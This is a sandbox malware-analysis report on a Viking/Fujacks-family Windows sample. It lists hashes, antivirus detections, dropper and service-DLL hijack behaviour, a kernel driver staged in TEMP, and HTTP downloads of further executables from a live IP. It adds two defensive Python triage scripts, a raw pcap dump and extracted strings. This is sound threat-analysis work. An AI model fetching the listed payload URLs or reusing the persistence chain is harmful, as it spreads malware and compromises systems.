Analysis Date: 2015-01-22 03:49:14
MD5: 1109ac5875db98037627964eadc8a121
SHA1: 3699c08ba3aa2a12cf5ac15a9a824ff6b149a458

Static Details:

File type: PE32 executable for MS Windows (console) Intel 80386 32-bit
Section .text md5: 679eecbb55c8de2e1cda1a998045634d sha1: 1cd246a4a3ab4ec14687f96eba72cd51cb4e560b size: 16384
Section .rdata md5: 28857bd294da49db3a448c63688f3fc5 sha1: a8eaa5438e79784d05ad39c308c7462eb35601d4 size: 4096
Section .data md5: 91cfd14b81d1d46eb3ba71577a1d5006 sha1: 3c0b62dda3a581888f1f5bbc14085423d6bd8c7f size: 12288
Section .tc md5: affb98fbecf2011924cac8068f306175 sha1: 978f835312efdcfc3129aa660a6641887015bd64 size: 28672
Timestamp: 2010-05-24 06:09:49
PEhash: b4f34144870ce4b94cbfa8a9bbbadc4aeb82633e
IMPhash: 91875e276b8d1980a1302e07fd805895
AV 360 Safe: Virus.Win32.Agent.O
AV Ad-Aware: Win32.Viking.AR
AV Alwil (avast): Viking-CF:Win32:Viking-CF
AV Arcabit (arcavir): Win32.Viking.AR
AV Authentium: W32/Viking.A.gen!Eldorado
AV Avira (antivir): TR/Drop.Agent.26112
AV BullGuard: Win32.Viking.AR
AV CA (E-Trust Ino): Win32/Viking.D
AV CAT (quickheal): W32.Agent.DP
AV ClamAV: Worm.Fujack-55
AV Dr. Web: Trojan.AVKill.31676
AV Emsisoft: Win32.Viking.AR
AV Eset (nod32): Win32/Agent.DP virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Viking.A.gen!Eldorado
AV F-Secure: Win32.Viking.AR
AV Grisoft (avg): Win32/Fujacks.S
AV Ikarus: Trojan-Downloader.Win32.Jadtre
AV K7: Error Scanning File
AV Kaspersky: Virus.Win32.Agent.dp
AV MalwareBytes: no_virus
AV Mcafee: W32/Fujacks.ay
AV Microsoft Security Essentials: Virus:Win32/Viking.NK
AV MicroWorld (escan): Win32.Viking.AR
AV Rising: Win32.Agent.hn
AV Sophos: W32/FuzVir-A
AV Symantec: W32.Loorp.A!inf
AV Trend Micro: PE_JEEFO.D
AV VirusBlokAda (vba32): Virus.Win32.Koklek

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Green\SoftName ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ Pid 800

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\09Y341EJ\desktop.ini
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ZYQTAK8Z\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\USEIANI1\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WXYZC1ER\desktop.ini
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 209.222.14.3
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1124

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1152
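
The process blocks above describe a staged install: malware.exe drops Expor.exe, which writes qmgr.dll and mspmsnsv.dll into system32 (the DLLs of the BITS and WmdmPmSN services respectively), starts WmdmPmSN and hands off to Loopt.bat; the batch file writes lsasvc.dll into the Windows File Protection cache (system32\dllcache) and then deletes both the dropper and itself; svchost.exe afterwards sets WmdmPmSN to auto-start, registers a kernel driver service (NtHid) from C:\WINDOWS\TEMP, and does the name resolution and WinINet cache writes under the NetworkService profile. The script below is an added example, not part of the sandbox output: it parses event lines in the layout used by this report into per-process records and applies a handful of behavioural checks that capture those steps. The rule names, the SERVICE_DLLS table and the sample lines (a subset copied from the blocks above) are this example's own.

```python
import re
from collections import defaultdict

# Event prefixes used by the sandbox report; the parser accepts both the
# "Key: value" layout and the run-together "Keyvalue" layout of the raw page.
ACTIONS = ("Creates File", "Deletes File", "Creates Process", "Creates Service",
           "Starts Service", "Creates Mutex", "Registry", "Winsock DNS")
EVENT_RE = re.compile(r"^(%s):?\s*(.+)$" % "|".join(re.escape(a) for a in ACTIONS))

# Legitimate Windows XP service DLLs that live in system32 (assumption of
# this example: a sample writing files with these names is replacing the
# service's code so that svchost.exe will load it).
SERVICE_DLLS = {"qmgr.dll": "BITS", "mspmsnsv.dll": "WmdmPmSN"}

# Constructed sample: a subset of the runtime event lines of this report,
# in the report's own process-block layout.
SAMPLE_REPORT = r"""
Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: pc1.114central.com
"""


def parse_report(text):
    """Return {process: [(action, target), ...]} from a runtime-details dump."""
    procs = defaultdict(list)
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("↳"):                       # process header
            current = line[1:].strip().strip('"')
            procs.setdefault(current, [])
            continue
        m = EVENT_RE.match(line)
        if m and current is not None:
            procs[current].append((m.group(1), m.group(2).strip()))
    return dict(procs)


def triage(procs):
    """Apply behavioural checks and return (rule, process, evidence) tuples."""
    findings = []
    for proc, events in procs.items():
        created = {t for a, t in events if a == "Creates File"}
        deleted = {t for a, t in events if a == "Deletes File"}
        written = {t.lower().rsplit("\\", 1)[-1] for t in created}
        hijacked = {svc for dll, svc in SERVICE_DLLS.items() if dll in written}
        for action, target in events:
            low = target.lower()
            name = low.rsplit("\\", 1)[-1]
            if action == "Creates Service" and low.endswith(".sys") and "\\temp\\" in low:
                findings.append(("driver_from_temp", proc, target))        # kernel driver staged in a temp dir
            if action == "Creates File" and "\\system32\\dllcache\\" in low:
                findings.append(("wfp_cache_write", proc, target))         # Windows File Protection cache poisoned
            if action == "Creates File" and name in SERVICE_DLLS:
                findings.append(("service_dll_overwrite:" + SERVICE_DLLS[name], proc, target))
            if action == "Starts Service" and target in hijacked:
                findings.append(("hijacked_service_start", proc, target))  # starts the service it just rewrote
            if action == "Registry":
                key, _, value = target.partition("➝")
                key = key.strip()
                if "\\services\\" in key.lower() and key.lower().endswith("\\start") and value.strip() == "2":
                    findings.append(("service_autostart", proc, key))      # Start = 2 is SERVICE_AUTO_START
        if proc.lower().endswith(".bat") and proc in deleted and any(d.lower().endswith(".exe") for d in deleted):
            findings.append(("self_deleting_dropper", proc, sorted(deleted)))
        for path in sorted(created & deleted):                            # written, used, removed
            findings.append(("transient_file", proc, path))
    return findings


def triage_report(text):
    return triage(parse_report(text))


if __name__ == "__main__":
    for rule, proc, evidence in triage_report(SAMPLE_REPORT):
        print("%-32s %-70s %s" % (rule, proc, evidence))
```

Run it on the sample and every step of the chain above comes out as a separate finding (WFP cache write and self-deletion for Loopt.bat, two service-DLL overwrites plus the WmdmPmSN start for Expor.exe, auto-start change, temp-staged driver and the transient NtHid.sys for svchost.exe). Feeding it the full block list from the report, including the PIPE and index.dat lines, produces the same findings; the extra lines simply do not match any rule.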

Network Details:

DNS: www.a.shifen.com (Type: A) ➝ 180.76.3.151
DNS: pc1.114central.com (Type: A) ➝ 209.222.14.3
DNS: nbtj.114anhui.com (Type: A)
DNS: www.baidu.com (Type: A)
DNS: www.490a-B8B5-9B8C1E870B0C.com (Type: A)
HTTP GET: http://209.222.14.3/nbok01/qqtt.exe.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://209.222.14.3/nbok01/dnfTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://209.222.14.3/nbok01/tlTT.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f6e626f 6b30312f 71717474   GET /nbok01/qqtt
0x00000010 (00016)   2e657865 2e657865 20485454 502f312e   .exe.exe HTTP/1.
0x00000020 (00032)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000070 (00112)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000080 (00128)   2e353037 3237290d 0a486f73 743a2032   .50727)..Host: 2
0x00000090 (00144)   30392e32 32322e31 342e330d 0a436f6e   09.222.14.3..Con
0x000000a0 (00160)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000b0 (00176)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230392e   727)..Host: 209.
0x00000090 (00144)   3232322e 31342e33 0d0a436f 6e6e6563   222.14.3..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a 0a0d0a                       .......

0x00000000 (00000)   47455420 2f6e626f 6b30312f 746c5454   GET /nbok01/tlTT
0x00000010 (00016)   2e657865 20485454 502f312e 300d0a41   .exe HTTP/1.0..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000060 (00096)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000070 (00112)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000080 (00128)   3237290d 0a486f73 743a2032 30392e32   27)..Host: 209.2
0x00000090 (00144)   32322e31 342e330d 0a436f6e 6e656374   22.14.3..Connect
0x000000a0 (00160)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000b0 (00176)   0a0d0a0a 0a0d0a                       .......
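
The three dumps above are the HTTP/1.0 requests with which the sample fetched further executables from 209.222.14.3; the Host header is the bare IP, the User-Agent is a fixed IE 6 string, the first path carries a doubled .exe extension, and the second and third dumps carry a few stray bytes after the blank line that ends the headers. The script below is an added example, not part of the sandbox output: it reverses the page's hexdump layout (offset, decimal offset in parentheses, up to four hex words, ASCII column) back into bytes, parses each request, and derives the network indicators and a few heuristic flags from it. The flag names are this example's own, and the embedded HEXDUMP is the first two dumps copied from above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the first two request dumps from the "Raw Pcap" section
# of this report, copied in the page's own hexdump layout.
HEXDUMP = """\
0x00000000 (00000)   47455420 2f6e626f 6b30312f 71717474   GET /nbok01/qqtt
0x00000010 (00016)   2e657865 2e657865 20485454 502f312e   .exe.exe HTTP/1.
0x00000020 (00032)   300d0a41 63636570 743a202a 2f2a0d0a   0..Accept: */*..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000050 (00080)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000060 (00096)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000070 (00112)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000080 (00128)   2e353037 3237290d 0a486f73 743a2032   .50727)..Host: 2
0x00000090 (00144)   30392e32 32322e31 342e330d 0a436f6e   09.222.14.3..Con
0x000000a0 (00160)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000b0 (00176)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   47455420 2f6e626f 6b30312f 646e6654   GET /nbok01/dnfT
0x00000010 (00016)   542e6578 65204854 54502f31 2e300d0a   T.exe HTTP/1.0..
0x00000020 (00032)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000050 (00080)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000060 (00096)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x00000070 (00112)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x00000080 (00128)   37323729 0d0a486f 73743a20 3230392e   727)..Host: 209.
0x00000090 (00144)   3232322e 31342e33 0d0a436f 6e6e6563   222.14.3..Connec
0x000000a0 (00160)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000b0 (00176)   0d0a0d0a 0a0d0a                       .......
"""

HEX_WORD = re.compile(r"^(?:[0-9a-fA-F]{2}){1,4}$")   # 2..8 hex digits, whole bytes
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def split_dumps(text):
    """One dump (one request) per blank-line-separated block."""
    return [b for b in re.split(r"\n\s*\n", text.strip()) if b.strip()]


def decode_hexdump(block):
    """Reverse the 'offset (decimal)  hex words  ascii' layout into bytes.
    Assumption: at most four hex words per line, and the ascii column of a
    short line never starts with a token that is itself 2..8 hex digits."""
    out = bytearray()
    for line in block.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue                                   # not a dump line
        for tok in tokens[2:6]:
            if not HEX_WORD.match(tok):
                break                                  # reached the ascii column
            out += bytes.fromhex(tok)
    return bytes(out)


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict
    trailing: bytes          # whatever followed the header terminator


def parse_request(raw):
    """Parse one HTTP request; bytes after the first CRLFCRLF are kept as
    'trailing' rather than rejected (the second dump carries three of them)."""
    head, sep, trailing = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header terminator in request")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers, trailing)


def indicators(req):
    """Network indicators plus heuristic flags (this example's own names)."""
    host = req.headers.get("host", "")
    ua = req.headers.get("user-agent", "")
    fname = req.target.rsplit("/", 1)[-1]
    flags = []
    if IPV4.match(host):
        flags.append("ip_literal_host")                # Host is a bare IP, no DNS needed
    if req.version == "HTTP/1.0":
        flags.append("http10")                         # legacy version, pair it with the UA when hunting
    if fname.lower().endswith(".exe"):
        flags.append("exe_download")
    if fname.count(".") >= 2 and fname.lower().endswith(".exe"):
        flags.append("double_extension")               # e.g. qqtt.exe.exe
    if "MSIE 6.0" in ua:
        flags.append("ie6_user_agent")
    if req.trailing:
        flags.append("trailing_bytes")
    return {"url": "http://%s%s" % (host, req.target), "host": host,
            "user_agent": ua, "flags": flags}


def extract(dump_text):
    return [indicators(parse_request(decode_hexdump(b))) for b in split_dumps(dump_text)]


if __name__ == "__main__":
    for ind in extract(HEXDUMP):
        print(ind["url"], ind["flags"])
```

The decoder ignores the ASCII column entirely and rebuilds the request from the hex words, so it also recovers bytes the ASCII column shows only as dots; the 183 bytes of the first dump end exactly at the CRLFCRLF, while the second dump decodes to a 180-byte request followed by `\n\r\n`, which is why its flags include `trailing_bytes`.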


Strings
\
.
 
.......:

FILE
         (((((                  H
08101BB
0A0^0s0
1.1E1K1Z1h1
1!1FIpu
;13B<J<
1=>=F=
:1G1P1]1
?%?2?]?
2(2B2N2W2c2l2x2
2?3H3Q
2D2J2O2U2b1n2t2
>)>2>E>S>\>
2K2f2v2
2T2d2{2
3$30l3XkGAC
;3D;H;L
43=3B3j3p3|3
4&414]4
4%4+4G4z4
490a-B8B5-9
49-E88E-4c47-98DC
4aaf-A336-C255
4Q5e5x
5$5)56A
5!6&6/6
;!;+;5;?;C;J;P;Z;d;n;x
:5:F:Y:w:|:
6.6:6C6M6W6\6
#&>6>Cg
6RD&YP
!71767D7R7^7i7p7
7.{645FF040
7FC663
7@ip:K
?7N7T7]
8-00AA
@.&'85
{-8<8^8
>!>*>8>B>H>V>`>n>t>
9*:/$:
954E}K
@\96DBA2^
9 9[9`9g9m9s9~9
9&9/9>9Q9e9o9{9
-9;9A9F9
9ao^@q
&9kIVB
A4J4Y4_4
A67-586
abnormal program termination
ADVAPI32.dll
AE4C57'
agX \s
a Play
appmgmts.dlld
AtG@sD
"bd	WVS
browser
By4ma[w,
C0M0W0
C1E870B0C
CancelConne
 cannot be run i
CloseHandle
Copyro
<'<CP<Z<|<I
CreateFileA
CreateProcessA
crypt'c
C@}Ur:
d0h0l0p0t0x0|
D0H0L0P0T0X0\0`0;
DA-6D69-472e-8981-DBC71
@.data
default
(D/fc_oL
(.Di@`
DOMAIN error
donx:"
DOS mode.
DSUVWh
$.DT4M
dU5 B~
=&=,=D=v=
E8J8O8[8`8i8o8z8
ep1'*"/
eParam$
Esht*6
ExecuUA
ExeName
ExitProcess
Expor.exe
F??3@YAXP
fA6G*r
f+D?	D
- floating point not loaded
FreeEnvironmentStringsA
FreeEnvironmentStringsW
G| 0+020e0
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileType
GetLastActivePopup
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetPrivateProfileStringA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetTempPathA
GetVersion
GetVersionExA
G|htcL
__GLOBAL_HEAP_SELECTED
h1l1.T
;hDdk h$
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
Hg/m,(
hI^HaR
-h)tyVe
Hur3'$
ifyTrLo
igVCRT
InfGma
ingCompatibil
IocSymbgT
i|tlh`
I/wput
IXR-!m
j/0@0E0R0f0
 -k 4/
kca:\lsa
KERNEL32.dll
KERNEL32.DLL
KEveny
K:\Q.pdb`q
L5PFHP7b
L7aU\Kc
LCMapStringA
LCMapStringW
LoadLibraryA
lp6a J
lstrcatA
M:d:m:
MessageBoxA
Microsoft Visual C++ Runtime Library
MSN Gam
MSVCRT.dll
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
n!e-cKm&BN
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 NT\Curr
NtQu9y
Nv`mG}
OA#k8s
oft\Wud
o@P3e4
Op-;4$
~OPEN=-
+OpsSCM
|otB.8
PathFileExistsA
>P?e?k?
Program: 
<program name unknown>
- pure virtual function call
PVh T@
pVKwOf
PWithTag`
q$A3<.
QEfY.Req
qidu.com
QQQQQQQ
\Ra7207
 `.rdat[
`.rdata
RECYCLER
RegCloseKey
RegConfig
RegCreateKeyA
.\reg.ini
RegSetValueA
RegSetValueExA
Remote
_rju@_fd
-<RoA%'_h7
RtlIoU
RtlUnwind
runtime error 
Runtime Error!
R@YuX;
S1[1`1m1
{schedsvc
SDPSRV
SetHandleCount
SHLWAPI.dll
[Sh$T@
SING error
SoftName
SOFTWARE\Green\
SOFTWARE\Mi
Sp`FFF
sSpec7
SS@SSPVSS
s_/UYY
swsocknetman1ssdp
.tcLCI0
TerminateProcess
.textVT
_This #g
!This program cannot be run in DOS mode.
T;_;i;z;
TLOSS error
tl`TDi
t|.O$/
ToFilnH
t#SSUP
tTisrv
t.;t$$t(
t$$VSS
?%_#txg
>"u:F@
	U;MhOy
uMpr.{
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
U:p:}:
#upnphostKn&s
URLDown
user32.dll
USER32.dll
@;v;{;
V3_3o3x3
V6sion\
v7Os2_qWSArcvF
VC20XC00U
Version
^Vh$T@
vieAak:m
VirtualAlloc
VirtualFree
VirtualProtect
vThfad
\v:.X$
W0YX0wx
|w9=trW*
WideCharToMultiByte
 winsta0
WmdmPmSN'Fa
Writea7
WriteFile
wsprintfA
"WWSh T@
	=x=}=
xdXD8f
 X -ibcB"
<)<.<X<i<o
xmlpbS
XPTPSW
XPVSSG
XRichS
xV.#"h
XX; tg
.y!GN&
|/Yr3Y
/YW'RB
_^][YY
YYh `@
@z}]u2o